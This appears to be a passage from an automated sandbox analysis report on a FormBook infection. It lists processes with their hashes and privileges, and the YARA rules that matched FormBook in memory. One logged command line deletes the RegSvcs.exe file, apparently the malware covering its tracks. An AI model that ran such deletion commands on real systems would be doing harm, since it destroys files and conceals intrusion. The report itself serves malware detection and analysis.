                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:high

                                                                            General

                                                                            Start time:08:40:53
                                                                            Start date:12/05/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff6f22f0000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:08:41:08
                                                                            Start date:12/05/2021
                                                                            Path:C:\Windows\SysWOW64\wlanext.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                            Imagebase:0x380000
                                                                            File size:78848 bytes
                                                                            MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:08:41:12
                                                                            Start date:12/05/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                                            Imagebase:0x2a0000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:08:41:12
                                                                            Start date:12/05/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff61de10000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >